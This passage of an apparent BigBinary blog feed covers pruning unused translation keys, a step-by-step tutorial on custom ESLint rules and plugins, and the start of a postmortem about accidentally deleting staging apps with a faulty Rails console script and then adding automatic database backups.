<code>neeto-commons-frontend</code> is a package encapsulating common code acrossNeeto projects.</p><p>How does this script work? Let us see it with the help of an example. Considerthe following translation file:</p><pre><code class="language-json">{  &quot;hello&quot;: &quot;Hello&quot;,  &quot;button&quot;: {    &quot;save&quot;: &quot;Save&quot;  }}</code></pre><p>This script will check if the translation key <code>hello</code> is used in the codebase ornot and if not, it will remove the translation key <code>hello</code> from the translationfile. Similarly, it will check if the translation key <code>button.save</code> is used inthe codebase or not and if not, it will remove the translation key <code>button.save</code>from the translation file.</p><p>However, an additional challenge surfaced due to the usage of interpolatedstrings as translation keys in specific scenarios. For instance, consider thefollowing code snippet:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const Button = ({ buttonType }) =&gt; {  const { t } = useTranslation();  const buttonType = &quot;save&quot;;  return &lt;div&gt;{t(`button.${buttonType}`)}&lt;/div&gt;;};</code></pre><p>Here, since the translation key is not a simple string, checking if it's used inthe codebase became complicated because of searching for the translation key<code>button.save</code> in the codebase won't return any results, and hence the scriptwill remove the translation key <code>button.save</code> from the translation file. But inthis case, the translation key <code>button.save</code> is used in the codebase.</p><p>To address this issue, we've made an improvement to the script. It now has abuilt-in capability to detect translation functions that use interpolatedtranslation keys. These identified translation functions are then included in asection for manual verification at the end of the script. So, once the scripthas finished running, you should manually analyze the identified translationfunctions to ensure that the translation keys used in them are present in thetranslation file. If any of these translation keys have been removed during theinitial step, they should be added back to the translation file.</p><p>Below is the demo of the script in action:</p><p><img src="/blog_images/2023/react-localization/remove-unused-translation-keys.gif" alt="remove-unused-translation-keys script"></p><p>That's all for now. We hope you found this blog useful. Our goal was to providevaluable insights that can help you with your localization journey. By learningfrom our experiences and applying these strategies, we believe you will bebetter equipped to handle the challenges of localization.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Enhance code quality and performance with ESLint]]></title>
       <author><name>Krishnapriya S</name></author>
      <link href="https://www.bigbinary.com/blog/enhance-code-quality-and-performance-with-eslint"/>
      <updated>2023-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/enhance-code-quality-and-performance-with-eslint</id>
      <content type="html"><![CDATA[<h2>Introduction</h2><p>ESLint is a widely adopted JavaScript linter that analyzes and enforces codingrules and guidelines. ESLint empowers developers by detecting errors, promotingbest practices, and enhancing code readability. This blog explores thefundamental concepts of ESLint, from installing the necessary dependencies tocustomizing rules, and integrating these custom rules into your host projects.</p><h2>Configure ESLint on a project</h2><p>To set up ESLint in your host project, install the ESLint package under<code>devDependencies</code> as it is only used for development and not in production:</p><pre><code class="language-bash">  npm install -D eslint  #or  yarn add -D eslint</code></pre><p>Now, you need to provide the required ESLint configurations. You can generateyour ESLint config file using any of the below commands:</p><pre><code class="language-bash">  npx eslint --init  #or  yarn run eslint --init</code></pre><p>This will prompt multiple options. You can proceed by selecting options thatsuit your use case. This generates a config file called <code>.eslintrc</code> in theformat you selected (<code>.json</code>, <code>.js</code>, etc). Here is an example of <code>.eslintrc.js</code>:</p><pre><code class="language-javascript">module.exports = {  root: true,  env: {    node: true,    browser: true,    es2021: true,  },  parserOptions: {    ecmaVersion: 2021,    sourceType: &quot;module&quot;,  },  extends: [&quot;eslint:recommended&quot;, &quot;plugin:react/recommended&quot;],  plugins: [&quot;react&quot;],  rules: {    &quot;no-console&quot;: &quot;warn&quot;,    &quot;no-unused-vars&quot;: &quot;error&quot;,  },  settings: {    react: {      version: &quot;detect&quot;,    },  },};</code></pre><ul><li><p>The <code>root</code> property is set to true to indicate that this is the rootconfiguration file and should not inherit rules from parent directories.</p></li><li><p>The <code>env</code> property specifies the target environments where the code will run,including node, browser, and es2021 for ECMAScript 2021 features.</p></li><li><p>In <code>parserOptions</code>, we specify JavaScript options like JSX support or ECMAversion.</p></li><li><p>The <code>plugins</code> property specifies the ESLint plugins to be used. Let us say youare working on a React project. You want your code to follow some React bestpractices and React-specific rules. You can achieve this by adding<code>eslint-plugin-react</code>.</p></li><li><p>The <code>extends</code> property includes an array of preset configurations to extendfrom, like <code>eslint:recommended</code> and <code>plugin:react/recommended</code>.</p></li><li><p>The <code>settings</code> property includes additional settings for specific plugins. Inthis case, we set the React version to <code>detect</code> for the React plugin, so thatthe React version is detected from our <code>package.json</code>.</p></li><li><p>In <code>rules</code>, we specify custom rule configurations for the codebase. Forinstance, the rule <code>no-unused-vars</code> helps identify and throw errors for unusedvariables in your code, while <code>no-console</code> warns against using <code>console.log()</code>statements in production code. All pre-existing rules are available in this<a href="https://eslint.org/docs/rules/">documentation</a> by ESLint. Rules have threeerror levels:</p><pre><code class="language-javascript">rules: {  &quot;no-console&quot;: &quot;warn&quot;, // Can also use 1  &quot;no-unused-vars&quot;: 2, // Can also use &quot;error&quot;  &quot;no-alert&quot;: &quot;off&quot;, // Can also use 0}</code></pre><ul><li><p><code>error</code> or <code>2</code>: This will turn on the rule as an error. This means thatESLint will report violations of this rule as errors. Rules are typicallyset to <code>error</code> to enforce compliance with the rule during continuousintegration testing, pre-commit checks, and pull request merging becausedoing so causes ESLint to exit with a non-zero exit code.</p></li><li><p><code>warn</code> or <code>1</code>: If you dont want to enforce compliance with a rule butwould still like ESLint to report the rules violations, set the severity to<code>warn</code>. This will report violations of this rule as warnings.</p></li><li><p><code>off</code> or <code>0</code>: This means the rule is turned <code>off</code> and will not beenforced. This can be useful if you want to disable a specific ruletemporarily throughout your project or if you don't find a particular rulerelevant to your project.</p></li></ul></li></ul><h2>Custom rules</h2><p>While ESLint comes bundled with a vast array of built-in rules, its truepotential lies in the ability to create custom rules tailored to your project'sunique requirements.</p><p>At the heart of every ESLint rule lies a well-crafted JavaScript object thatdefines its behavior. But, before we dive into the basic structure of a customESLint rule, there is something you need to get familiar with, called an AST(Abstract Syntax Tree).</p><h3>Abstract Syntax Tree (AST)</h3><p>AST can be thought of as an interpreter that dissects your code and representsit in a tree-like structure of interconnected nodes. An ESLint parser convertscode into an abstract syntax tree that ESLint can evaluate. Consider thefollowing JavaScript code snippet:</p><pre><code class="language-javascript">const sum = (x, y) =&gt; x + y;</code></pre><p>This is how its AST looks:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/ast_demo.gif" alt="AST Demo"></p><p>In this example, the root node is the <code>Program</code> node, which represents theentire code file. Within it, there are several nested nodes,<code>VariableDeclarator</code>, <code>ArrowFunctionExpression</code>, and so on, each dedicated todifferent parts of the code. As demonstrated in the animation, when hoveringover each node, the corresponding code segment on the LHS is highlighted. Toexplore and interact with both code and its AST, you can utilize the<a href="https://astexplorer.net">AST Explorer</a> tool.</p><h3>Basic structure of a custom rule</h3><p>Now that you know what AST is, let us learn how these trees help us in creatinga custom rule. You will need to analyze the code's tree structure to find outwhich node is to be chosen as the <strong>visitor node</strong>. A visitor node representsthe target node that is visited or traversed during the linting process.</p><p>To understand further, let us take into account a simple rule and try to buildit. Let us implement <code>no-var</code> rule. This rule encourages the use of <code>let</code> and<code>const</code> keywords, instead of <code>var</code> keyword to declare variables. This usagepromotes block scoping and prevents any re-declarations.</p><p>The AST for a code snippet containing <code>var</code> would look like this:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/var_keyword_ast_demo.gif" alt="Var Keyword AST Demo"></p><p>So, the node we are interested in examining is the <code>VariableDeclaration</code> node.Hence, this will be our visitor node. This node contains an attribute called<code>kind</code>, which contains the value <code>var</code>, <code>let</code>, or <code>const</code> depending on thekeyword used. All we have to do is verify whether it is a <code>var</code> and then throwan error for that particular node.</p><p>We want this logic to run on all <code>VariableDeclaration</code> nodes:</p><pre><code class="language-javascript">if (node.kind === &quot;var&quot;) {  // raise error}</code></pre><p>Let us embed that logic inside an ESLint rule object:</p><pre><code class="language-javascript">module.exports = {  meta: {    type: &quot;problem&quot;, // Can be: &quot;problem&quot;, &quot;suggestion&quot; or &quot;layout&quot;.    docs: {      description: &quot;Disallow the use of var.&quot;,      category: &quot;Best Practices&quot;,    },  },  create: context =&gt; ({    VariableDeclaration(node) {      if (node.kind === &quot;var&quot;) {        context.report({ node, message: &quot;Using var is not allowed.&quot; });      }    },  }),};</code></pre><ul><li>The <code>meta</code> object provides metadata about your rule, including its type,description, category, etc.</li><li>The <code>create</code> function is the entry point for your rule implementation. It iscalled by ESLint and provides the <code>context</code> object, which allows you tointeract with the code being analyzed.</li><li>Within the create function, you can define one or more visitor methods thattarget specific node types in the AST. The rule logic will be defined insidethe visitor methods. In our example, the logic needs to be run only on all<code>VariableDeclaration</code> nodes. Thus <code>VariableDeclaration</code> is the only visitormethod defined.</li><li>You can check for violations and report errors using <code>context.report()</code>.</li></ul><p>This is an example of how your rule would throw an error to that particularnode, once integrated into your project:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/eslint_error_example.gif" alt="ESlint Error Example"></p><h2>Testing ESLint rules</h2><p>Rule testing in ESLint involves verifying the behavior of custom rules byproviding sample code snippets that should trigger violations (invalid cases)and code snippets that should pass without violations (valid cases).<strong>RuleTester</strong> is an ESLint utility that simplifies the process of defining andrunning such tests.</p><h3>Configuring RuleTester</h3><p>First, you need to create a <code>RuleTester</code> instance. You can fine-tune the parseroptions, environments, and other configurations when you create the instance:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);const ruleTester = new RuleTester({  parserOptions: {    ecmaFeatures: { jsx: true },    ecmaVersion: 2020,    sourceType: &quot;module&quot;,  },});</code></pre><h3>Writing test cases</h3><p>Now, you can use RuleTester's <code>run()</code> method to craft scenarios in the <code>valid</code>and <code>invalid</code> arrays to cover all possible code variations, which will be testedagainst your rule. Also, you can provide the expected error message, as the<code>message</code> property in <code>errors</code>. Your basic test will look something like this,for the <code>no-var</code> rule you implemented:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);const rule = require(&quot;../rules/no-var&quot;);const ruleTester = new RuleTester({  parserOptions: {    ecmaFeatures: { jsx: true },    ecmaVersion: 2020,    sourceType: &quot;module&quot;,  },});ruleTester.run(&quot;no-var&quot;, rule, {  valid: [&quot;let x = 10;&quot;, &quot;const x = 10;&quot;],  invalid: [    {      code: &quot;var x = 10;&quot;,      errors: [{ message: &quot;Using var is not allowed.&quot; }],    },  ],});console.log(&quot;Completed all tests for no-var rule&quot;);</code></pre><h2>Diving deeper into custom rule creation</h2><p>Let us create another rule, that enforces the use of strict equality (===) overloose equality (==). Strict equality provides more accurate comparison resultsand helps prevent potential bugs caused by type coercion.</p><h3>Basic implementation</h3><ol><li><p>Create a new file called <code>strict-equality.js</code>.</p></li><li><p>Define the rule by providing a type, description, and <code>create</code> function toimplement our logic.</p><pre><code class="language-javascript">module.exports = {  meta: {    type: &quot;problem&quot;,    docs: {      description: &quot;Enforce the use of strict equality.&quot;,      category: &quot;Best Practices&quot;,    },  },  create: context =&gt; ({    //Implementation logic.  }),};</code></pre></li><li><p>Now we need to figure out the visitor node we need. This is where you can use<a href="https://astexplorer.net">AST Explorer</a>. Let us consider the below example:</p><pre><code class="language-javascript">if (a == b) {  //Do something}</code></pre><p>We can see that the AST notation for the same looks something like this:</p><pre><code class="language-javascript">{  &quot;type&quot;: &quot;Program&quot;,  &quot;body&quot;: [    {      &quot;type&quot;: &quot;IfStatement&quot;,      &quot;test&quot;: {        &quot;type&quot;: &quot;BinaryExpression&quot;,        &quot;operator&quot;: &quot;==&quot;,        &quot;left&quot;: {          &quot;type&quot;: &quot;Identifier&quot;,          &quot;name&quot;: &quot;a&quot;        },        &quot;right&quot;: {          &quot;type&quot;: &quot;Identifier&quot;,          &quot;name&quot;: &quot;b&quot;        }      },      // Remaining attributes    }  ]}</code></pre><p>From this, it is evident that the node we are interested in has the type<code>BinaryExpression</code>. All we have to check is whether the <code>operator</code> for thisnode is &quot;==&quot; and then throw an error for that particular node.</p></li><li><p>Let us write this logic into our <code>create</code> function, and report the error witha suitable message:</p><pre><code class="language-javascript">create: context =&gt; ({  BinaryExpression(node) {   if (node.operator !== &quot;==&quot;) return;   context.report({     node,     message: &quot;Use strict equality instead of loose equality.&quot;,   });  },}),</code></pre></li></ol><h3>Implementing automatic fix</h3><p>Right now, all our rule does is detect any loose equalities and show the errormessage for that line. Let us add some logic to provide an automatic fix for thedetected errors. To achieve this, include the <code>fix</code> attribute in the<code>context.report()</code> method. We can create a string representing the correctedcode and utilize the <code>replaceText</code> function provided by the <code>context.fixer</code>object to replace the specific <code>node</code> with the modified string. To know aboutall such functions offered by the <code>fixer</code> object, please check this<a href="https://eslint.org/docs/latest/extend/custom-rules#applying-fixes">documentation</a>,on applying fixes.</p><p>Now, we need to create a string to replace the node with. Inspect this portionof the AST we generated earlier:</p><pre><code class="language-javascript">&quot;type&quot;: &quot;BinaryExpression&quot;,&quot;operator&quot;: &quot;==&quot;,&quot;left&quot;: {  &quot;type&quot;: &quot;Identifier&quot;,  &quot;name&quot;: &quot;a&quot;},&quot;right&quot;: {  &quot;type&quot;: &quot;Identifier&quot;,  &quot;name&quot;: &quot;b&quot;}</code></pre><p>The LHS and RHS of the operands can be accessed as, <code>node.left</code> and <code>node.right</code>respectively. The value of these operands can be fetched from the <code>name</code>attribute and our fix string can be constructed like this:</p><pre><code class="language-js">`${node.left.name} === ${node.right.name}`;</code></pre><p>Hence adding this logic to our rule:</p><pre><code class="language-javascript">module.exports = {  meta: {    // Other properties    fixable: &quot;code&quot;, // Include this, when your rule provides a fix.  },  create: context =&gt; ({    BinaryExpression(node) {      if (node.operator !== &quot;==&quot;) return;      context.report({        node,        message: &quot;Use strict equality instead of loose equality.&quot;,        fix: fixer =&gt; fixer.replaceText(          node,          `${node.left.name} === ${node.right.name}`        );      });    },  }),};</code></pre><p>But, what if the LHS or RHS contains expressions, like these:</p><pre><code class="language-javascript">if(array[index].type == a)</code></pre><p>In that case, <code>node.left</code> will have more nested nodes:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/left_operator_ast.png" alt="Left Operator AST"></p><p>Now, we can't just proceed by using <code>node.left.name</code>. So, how do we make surethat we don't lose any data? The <code>getSourceCode()</code> function is a utilityprovided by ESLint that allows you to retrieve the source code corresponding toa specific node in the <code>context</code>. We can obtain the source code as a string byusing <code>getText()</code> function on the node. So for the above example, we can write:</p><pre><code class="language-javascript">context.getSourceCode().getText(node.left); // Returns `array[index].type`</code></pre><p>Now, let us modify our <code>create</code> function to handle this edge case and ourcompleted rule would look like this:</p><pre><code class="language-javascript">module.exports = {  meta: {    type: &quot;problem&quot;,    docs: {      description: &quot;Enforce the use of strict equality.&quot;,      category: &quot;Best Practices&quot;,    },    fixable: &quot;code&quot;,  },  create: context =&gt; ({    BinaryExpression(node) {      if (node.operator !== &quot;==&quot;) return;      context.report({        node,        message: &quot;Use strict equality instead of loose equality.&quot;,        fix: fixer =&gt; {          const leftNode = context.getSourceCode().getText(node.left);          const rightNode = context.getSourceCode().getText(node.right);          return fixer.replaceText(node, `${leftNode} === ${rightNode}`);        },      });    },  }),};</code></pre><h3>Adding tests for the rule</h3><p>In our earlier sections, you saw how to write tests for your custom rule. Now,let us implement the same for our <code>strict-quality</code> rule. We need to add validand invalid cases as strings to the respective arrays. Inside, the <code>invalid</code>array, you can make use of the <code>output</code> attribute to provide the expected fixedcode for that particular invalid case. So our tests will look like this:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);const rule = require(&quot;../rules/strict-equality&quot;);const ruleTester = new RuleTester({  parserOptions: {    ecmaFeatures: { jsx: true },    ecmaVersion: 2020,    sourceType: &quot;module&quot;,  },});const message = &quot;Use strict equality instead of loose equality.&quot;;ruleTester.run(&quot;strict-equality&quot;, rule, {  valid: [    &quot;if (a === b) {}&quot;,    &quot;if (a === b) alert(1)&quot;,    &quot;if (a === b) { alert(1) }&quot;,  ],  invalid: [    {      code: &quot;if (a == b) {}&quot;,      errors: [{ message }],      output: &quot;if (a === b) {}&quot;,    },    {      code: &quot;if (getUserRole(user) == Roles.DEFAULT) grantAccess(user);&quot;,      errors: [{ message }],      output: &quot;if (getUserRole(user) === Roles.DEFAULT) grantAccess(user);&quot;,    },  ],});console.log(&quot;Completed all tests for strict-equality rule&quot;);</code></pre><h2>Custom ESLint plugins</h2><p>In real-world scenarios, we will have multiple custom rules and configurationsthat we want to enforce consistently across our projects. This is where customESLint plugins become invaluable, as they allow us to bundle and package allthese elements into a single plugin. In the Neeto ecosystem, we use our customplugin, <code>eslint-plugin-neeto</code>, to maintain a uniformly structured codebase.</p><p>In this section, we will create a custom ESLint plugin for the custom rules wecreated, and learn how to integrate it into our projects.</p><h3>Getting started with a custom plugin</h3><ol><li><p>Create a new directory and initialize a new npm package for your plugin. Thepackage name should always follow the naming format, <code>eslint-plugin-*</code> :</p><pre><code class="language-bash">mkdir eslint-plugin-customcd eslint-plugin-customnpm init -y</code></pre></li><li><p>Arrange our previously defined rules and tests in this folder structure:</p><pre><code class="language-javascript">eslint-plugin-custom package.json index.js src    rules      no-var.js      strict-equality.js    tests      index.js      no-var.js      strict-equality.js README.md</code></pre></li><li><p>Let us add ESLint as a devDependency in our plugin.</p><pre><code class="language-bash">npm install -D eslint</code></pre></li></ol><h3>Adding and exporting custom rules</h3><p>Copy the rules we created into <code>no-var.js</code> and <code>strict-equality.js</code>. Now, how dowe help the plugin find our rules? You can add the following to <code>index.js</code> inthe plugin's root directory:</p><pre><code class="language-javascript">module.exports = {  rules: {    &quot;no-var&quot;: require(&quot;./src/rules/no-var&quot;),    &quot;strict-equality&quot;: require(&quot;./src/rules/strict-equality&quot;),  },};</code></pre><p>By configuring the index file in this way, you ensure that ESLint recognizes andassociates your custom rule with the specified name, making it accessible inESLint configurations.</p><h3>Adding test files</h3><p>In a similar manner to how rules are handled, we can establish a unified entrypoint for our tests in <code>src/tests/index.js</code>:</p><pre><code class="language-javascript">require(&quot;./no-var.js&quot;);require(&quot;./strict-equality.js&quot;);</code></pre><p>You can either set up any test framework of your choice to run the tests or runthem directly using:</p><pre><code class="language-bash">node src/tests</code></pre><p>Explore the complete code for the custom plugin, containing both the rules andtheir corresponding tests that we have developed this far, in<a href="https://github.com/KrishnapriyaSkk/eslint-plugin-custom">eslint-plugin-custom</a>.</p><h3>Integrating the custom plugin</h3><p>You saw in earlier sections that, it is possible to test your rules using<code>RuleTester</code>. While this method helps you specify all the edge cases and testyour rules against them, it is not that easy, to think of all possible edgecases. For this, we need to run our rules in real projects and we will have toachieve this without publishing our package to the remote registry right away.</p><ul><li><h4>Integrate and test locally using yalc</h4><p>Yalc acts as a very simple local repository for your locally developedpackages that you want to share across your local environment. Let us see howwe can use <code>yalc</code> to test our custom plugin on host projects.</p><ol><li><p>Install <code>yalc</code> globally:</p><pre><code class="language-bash">npm install -g yalc</code></pre></li><li><p>Navigate to the root directory of your custom plugin and publish it to thelocal <code>yalc</code> store:</p><pre><code class="language-bash">cd eslint-plugin-customyalc publish</code></pre></li><li><p>Navigate to the root directory of the host project. Add the custom pluginusing <code>yalc</code>:</p><pre><code class="language-bash">cd my-host-projectyalc add eslint-plugin-custom</code></pre></li><li><p>Update your ESLint configuration in the host project to include the pluginand its rules in <code>.eslintrc.js</code>:</p><pre><code class="language-javascript">module.exports = {  //Other configurations  plugins: [&quot;custom&quot;],  rules: {    &quot;custom/no-var&quot;: &quot;error&quot;,    &quot;custom/strict-equality&quot;: &quot;error&quot;,    //Other rules  },};</code></pre><p>Here, we have excluded the prefix <code>eslint-plugin-</code>, while specifying theplugin name and used only the word <code>custom</code>. ESLint automaticallyrecognizes plugins without the <code>eslint-plugin-</code> prefix when specified inthe configuration file. Trimming off this prefix is a common practice tosimplify the plugin name and make it more user-friendly in the context ofthe host project.</p><p>We also namespaced the rule under their respective plugins. By doing so, weensure that ESLint can distinguish between conflicting rule names if any,and apply the correct rules based on your configuration.</p></li><li><p>Testing the custom plugin in the host project:</p><ul><li><p>This can be done by running ESLint rules for a specific file:</p><pre><code class="language-bash">npx eslint &lt;file_path&gt;#or to apply and test fixesnpx eslint --fix &lt;file_path&gt;</code></pre></li><li><p>You can use a glob pattern, such as <code>**/*.js</code>, to run ESLint on theentire project by specifying the file path pattern that matches thedesired files to be linted:</p><pre><code class="language-bash">npx eslint &quot;./app/javascript/src/**/*.{js,jsx,json}&quot;</code></pre></li><li><p>You can integrate ESLint to VSCode by installing the<a href="https://marketplace.visualstudio.com/items?itemName=dbaeumer.vscode-eslint">ESLint extension</a>.Once installed, to apply any changes made to ESLint configurations,simply restart the ESLint server, by opening the Command Palette(<code>Ctrl+Shift+P</code> or <code>Cmd+Shift+P</code>) and search for &quot;ESLint: Restart ESLintServer&quot;. This will help you see red squiggly lines under the codecontaining the error. It is a good visual representation of our ESLintrule.</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/restart_eslint_server.gif" alt="Restart ESLint Server"></p></li></ul><p>Do not forget to note down any edge cases you come across, so that you canrefactor your rule's logic to cover those cases.</p></li><li><p>Every time you make a change in your plugin, you can push those changes toyour host projects by running the following command from your ESLintplugin's root directory:</p><pre><code class="language-bash">yalc push</code></pre></li><li><p>Once you are done with testing your plugin locally, remove it from the<code>package.json</code> of your host project by running the following command fromyour host project's root directory:</p><pre><code class="language-bash">yalc remove eslint-plugin-custom</code></pre></li></ol></li><li><h4>Integrating published plugin package</h4><p>Once you publish the plugin into the remote registry, you can integrate itinto your host projects.</p><ol><li><p>Add the custom plugin as a devDependency to your project using the command:</p><pre><code class="language-bash">yarn add -D &quot;eslint-plugin-custom&quot;</code></pre></li><li><p>Configure ESLint to enable your custom rules. We have already added thenecessary configurations in step 6, of integrating using <code>yalc</code>.</p></li></ol></li></ul><h3>Adding a recommended configuration</h3><p>When dealing with multiple host projects, it becomes a repetitive task toinclude the same rules and error levels in each project. Any updates oradjustments to these rules would then need to be applied across all projectsindividually. To streamline this process, the recommended configuration lets uskeep all those configs within the ESLint plugin itself. This way, we can easilymaintain and modify the rules without the need for duplicating efforts in everyproject.</p><p>Imagine we want to recommend using our current rules as warnings. In that case,we can add a recommended config in our eslint-plugin-custom's <code>index.js</code>:</p><pre><code class="language-javascript">module.exports = {  rules: {    &quot;no-var&quot;: require(&quot;./src/rules/no-var&quot;),    &quot;strict-equality&quot;: require(&quot;./src/rules/strict-equality&quot;),  },  configs: {    recommended: {      rules: {        &quot;custom/no-var&quot;: &quot;warn&quot;,        &quot;custom/strict-equality&quot;: &quot;warn&quot;,      },    },  },};</code></pre><p>In the host project, where you want to use your custom plugin, you can installthe plugin and configure ESLint to extend the recommended configuration in<code>.eslintrc.js</code>:</p><pre><code class="language-javascript">{  &quot;extends&quot;: [    &quot;eslint:recommended&quot;,    &quot;plugin:custom/recommended&quot;  ],  // Other ESLint configurations for your project.  &quot;rules&quot;: {    // Other project-specific rules.  }}</code></pre><h2>General tips on using ESLint</h2><p>In this section, we will explore some general tips and tricks that will empoweryou to navigate through false positives, troubleshoot common pitfalls, andhandle ESLint warnings well.</p><h3>Handling false positives</h3><p>Sometimes, ESLint can be overzealous and flag code as incorrect even when it'sacceptable. Alternatively, there may be instances where we intentionally chooseto adopt a particular coding style and wish to prevent ESLint from throwingerrors. Here are a couple of strategies to address these errors:</p><ol><li><p>Disabling ESLint rules:</p><p>You can temporarily disable the rule responsible for the false alarm byadding a comment above the code, like this:</p><pre><code class="language-javascript">// eslint-disable-next-line &lt;rule_name&gt;</code></pre><p>Example:</p><pre><code class="language-javascript">// Reason for disabling the rule.// eslint-disable-next-line no-consoleconsole.log(&quot;All tests were executed&quot;);</code></pre><p>Do not forget to specify the reason why you have disabled that particularrule for that line, to avoid any future confusion.</p></li><li><p>Altering configuration:</p><p>ESLint provides an option to configure a rule as per your needs. Some rulesaccept additional options to customize its behavior. An example is,<a href="https://eslint.org/docs/latest/rules/camelcase">camelcase</a>. It enforces theuse of camel case for variable names. It accepts<a href="https://eslint.org/docs/latest/rules/camelcase#options">options</a> to disableenforcing camel casing for specific cases. In a case where, you want to use adifferent naming convention, such as snake case, for object keys, you can setthe <code>properties</code> option to <code>never</code>:</p><pre><code class="language-javascript">// .eslintrc{  &quot;rules&quot;: {    &quot;camelcase&quot;: [&quot;error&quot;, { &quot;properties&quot;: &quot;never&quot; }]  }}</code></pre><p>This configuration tells ESLint to exclude properties (object keys) from thecamel case requirement.</p><p>We can accept options in our custom rules and access them inside our rulesvia <code>context.options</code>. Then, you can perform the necessary logic to handlesuch cases.</p></li></ol><h3>Common reasons for ESLint checks to crash</h3><p>While using ESLint, you might encounter situations where ESLint checks crash orfail unexpectedly. Keep these in mind to avoid such crashes:</p><ol><li><p>If you update or switch ESLint configurations, make sure to run<code>yarn install</code> or <code>npm install</code> to install any missing dependencies.</p></li><li><p>Ensure that your ESLint configuration has accurate parser options, like thelanguage version and ECMAScript features, as they are crucial for ESLint toparse and analyze your code correctly.</p></li></ol><h3>Should we consider ESLint warnings?</h3><p>As we've seen in previous sections, ESLint allows us not only to report errorsbut also to show warnings. When creating a rule, it may not always be possibleto cover every edge case and eliminate all false positives. In such situations,we can configure these rules as warnings instead. Additionally, there are caseswhere we don't want to enforce a specific coding style but rather suggest a moreoptimized approach to the developer. In such scenarios as well, we avoidthrowing errors.</p><p>While ESLint warnings don't necessarily require disabling through comments, it'srecommended to review and address them whenever feasible. This practice improvescode quality, helps prevent future errors, and enhances the overall robustnessof the codebase. However, if you find that the suggestion does not apply to yourspecific situation, you have the flexibility to disregard it or disable it byincluding a comment.</p><h2>Conclusion</h2><p>Throughout this blog, we explored various aspects of ESLint, includingunderstanding its purpose and benefits, configuring rules on a project, writingcustom rules and plugins, and testing them effectively. We also discussedgeneral tips for using ESLint, such as handling false positive errors, dealingwith crashes, and considering warnings.</p><p>Remember to periodically review and update your ESLint configurations as yourproject evolves, and stay up-to-date with the latest ESLint releases and ruleupdates to take advantage of new features and improvements. To know more aboutfunctionalities of ESLint, you can refer the<a href="https://eslint.org/docs/">ESLint documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Accidentally deleting all staging applications and building automatic database backup]]></title>
       <author><name>Subin Siby</name></author>
      <link href="https://www.bigbinary.com/blog/routine-db-exports-neetodeploy"/>
      <updated>2023-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/routine-db-exports-neetodeploy</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://neeto.com/neetodeploy">NeetoDeploy</a>, an alternative forHeroku makes it easy to deploy and manage applications on the cloud. It is built with amix of Kubernetes and Rails.</p><p>We switched our pull-request<a href="https://devcenter.heroku.com/articles/github-integration-review-apps">review apps from Heroku</a>to NeetoDeploy a couple of months ago, and it has been doing well. As the nextstep of the process, we are building features to target staging and production.We had an essential staging set up in March, and by the end of the month, we hadmigrated staging deployments of all Neeto from Heroku to NeetoDeploy. Everythingwas working fine for a week until I made a grave mistake.</p><h2>What happened</h2><p>Whenever a PR is opened or a new commit is pushed, NeetoDeploy receives awebhook call from GitHub. Review/staging apps are created/updated on NeetoDeployin response to these webhook calls.</p><p>On 2023 April 5, a misconfiguration caused NeetoDeploy's webhook handler tomalfunction for an hour. As a result, some review apps were not deleted evenafter the corresponding PRs were closed or merged. The solution wascross-checking review apps with the open PRs and deleting the unwanted apps.Using <code>rails console</code>, this could be done live on the server.</p><p>Here is what that solution looked like:</p><pre><code class="language-ruby">GithubRepository.find_each do |github_repository|  access_token = github_repository.github_integration.access_token  github_client = Octokit::Client.new(access_token:)  open_pr_numbers = github_client    .pull_requests(github_repository.name, state: :open)    .pluck(:number)  github_repository.project.apps.find_each do |app|    next if open_pr_numbers.include?(app.pr_number)    Apps::DestroyService.new(app).process!  endend</code></pre><p>But there is a terrible mistake in the above code. See if you can spot that.</p><p>I'm going to wait...</p><p>A bit more waiting... Enough waiting; here's the mistake:</p><p>There is no filter in the apps that were picked to be destroyed. This snippetwas written at a time when we only had review apps. So<code>github_repository.project.apps</code> was expected to return review apps. But we nowalso had staging apps in the database. And those staging apps weren't filteredout here. After running the snippet and noticing it took longer than expected, Irealized the mistake and instantly pressed<code>CTRL + C</code>. Of course, it was takingtime since it was deleting all the staging app databases and dynos .</p><p>In the end, out of 33 staging apps, only five remained. And thus started, theprocedure to restore all of them.</p><h2>The recovery</h2><p>NeetoDeploy already had the feature to do manual<a href="https://help.neetodeploy.com/articles/database-exports">DB exports</a> but thiswasn't being done routinely. We were only hosting review apps (whose data neednot be persisted reliably), and staging had only started just a week before.</p><p>We had database backups from a week before (when we ultimately migrated stagingapps off Heroku), and one by one, our small team of 4 brought back all the appsin 2 days. The next step is to try not to let this happen again; if it were tohappen, we have a contingency plan. We thought of two types of contingencyplans:</p><ul><li>Automatic scheduled backups</li><li>Disk snapshots of the DB</li></ul><h2>Automatic scheduled backups</h2><p>The idea is that the database would be exported at a particular time every day.Backups older than a month would be deleted automatically to save space.</p><p>We implemented this in a week. Every day at 12 AM UTC, all staging+productiondatabases would be exported and uploaded to an S3 bucket.</p><p>While this feature was being implemented, I used the Rails console to manuallyexport all the apps. The exported file URLs of each DB were manuallycopied to a text file. <a href="https://aria2.github.io/">aria2c</a> was then used todownload them in parallel to a local folder:</p><pre><code class="language-bash">aria2c -c --input-file export_urls.txt</code></pre><p>aria2c is a smart downloader. It will resume interrupted downloads, wouldntduplicate downloads, and do everything in parallel.</p><h2>Disk snapshots of the DB</h2><p>The other contingency method is to do periodic snapshots of the volume holdingthe DB. We are working on this.</p><p>You can refer to this<a href="https://about.gitlab.com/blog/2017/02/10/postmortem-of-database-outage-of-january-31/#broken-recovery-procedures">blog post of GitLab</a>to know their recovery procedures when they faced a significant data lossin 2017.</p><h2>Lessons</h2><p>The core lesson here is to call destructive methods very carefully. Instead ofcalling the <code>DestroyService</code> instantly, there could have been an intermediatehuman check:</p><pre><code class="language-ruby">apps = []GithubRepository.find_each do |github_repository|  access_token = github_repository.github_integration.access_token  